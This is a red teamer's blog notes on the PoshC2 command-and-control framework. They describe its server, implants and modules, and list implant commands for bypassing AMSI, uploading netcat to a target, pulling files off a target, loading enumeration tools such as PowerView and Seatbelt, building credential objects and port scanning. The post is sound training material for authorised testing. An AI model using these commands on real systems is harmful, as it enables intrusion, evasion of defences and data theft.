PoshC2: A Red Teamer’s Notes

Uday Mittal, July 8, 2020

This is an ongoing post containing my notes on PoshC2 usage.

What is PoshC2?

PoshC2 is command and control (C2) software. It is used to carry out post-exploitation tasks such as persistence, privilege escalation, lateral movement etc. during penetration testing and red teaming exercises. It supports Python3, PowerShell (v2 and v5), C# and C++. The official documentation is available here.

All of PoshC2 functionality can be divided into five components:

PoshC2 Server – Serves payloads that, when executed on the target machine(s), send a connection back to PoshC2. The server console also displays the output of command(s) executed on an implant. The server is written in Python.

Implants Receiver – Listens for the incoming implant connections and aggregates them. It is also used to load modules and execute commands on a single, multiple or all implants.

Payloads – Commands, shellcode and executable binaries that, when executed on the target machine(s) (aka implants), send a connection back to the Implants Receiver. Payloads are developed using C#, Python, PowerShell, JavaScript and VBScript, and support Windows, Linux (Python) and macOS (Python).

Implants – Target machine(s) connected to PoshC2.

Modules – Scripts (PowerShell and Python) and executable binaries (C#) that help in conducting various post-exploitation tasks such as enumeration, privilege escalation, lateral movement, hash dump, port forwarding etc. A comprehensive list of modules is available here.

How to use?

The following video shows how to get PoshC2 up and running quickly. It covers:

  • Installation on Kali Linux 2020.2
  • Configuring PoshC2
  • Running the PoshC2 server and Implants Receiver
  • Managing implants
  • Modules
  • Loading C# and PowerShell modules on an Implant
  • Running commands on an implant

Read this to learn more about the lab environment used in this video.

Useful Commands (C# Implants)

Selecting Implant(s)

  • To select a single implant, enter the ImplantID
  • To select multiple implants, enter a comma separated list of ImplantIDs
  • To select all implants, enter ALL

Quick Reference List of Commands

Issue the following command when connected to one or more implants:

help

Bypass AMSI

bypass-amsi

Upload files

upload-file <source file path> <destination file path>
Example: upload-file /usr/share/windows-binaries/nc.exe C:\Users\Public\nc.exe

Download files

download-file <file path>
Example: download-file 'C:\\Users\\Public\\supersecretdata.txt'

This will save a copy of the target file in the PoshC2 project directory.

List Modules

To list implant specific modules, select an implant and issue the following command:

listmodules

To list all modules, issue the following command at the implant selection prompt:

listmodules

Load a C# Module

loadmodule <module name>
Example: loadmodule SharpView.exe

Load a PowerShell Module

pslo <module name>
Example: pslo powerview.ps1

You can also use loadmoduleforce to load modules.

Execute a PowerShell Command

sharpps <command>
Example: sharpps Get-ChildItem -Force -Recurse

Convert Username and Password to a PSCredentials object

sharpps [string]$userName = 'IND\user.ind02'
sharpps [string]$userPassword = '<password>'
sharpps [securestring]$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force
sharpps [pscredential]$credObject = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword)

(The password value was garbled in the page source and is shown here as the placeholder <password>.)

After executing the above commands, $credObject can be passed as the value of the -Credential parameter in PowerShell commands that accept it.

Enumerate an Implant

ls-recurse <directory path>
Example: ls-recurse C:\Users
get-userinfo
get-computerinfo
loadmodule Seatbelt.exe
seatbelt all
sharpup

Port Scan

portscan <IP> <port range> <delay in seconds> <max threads>
Example: portscan "192.168.3.8" "1-1000" 1 100

Uday Mittal

Uday Mittal is a cybersecurity professional with rich working experience working with various industries including telecom, publishing, consulting and finance. He holds internationally recognized certifications such as CRTP, OSCE, OSCP, CISSP, CISA, CISM, CRISC among others. He speaks on cybersecurity awareness, offensive security research etc. and has authored various articles on topics related to cyber security and software development for a leading magazine on open source software.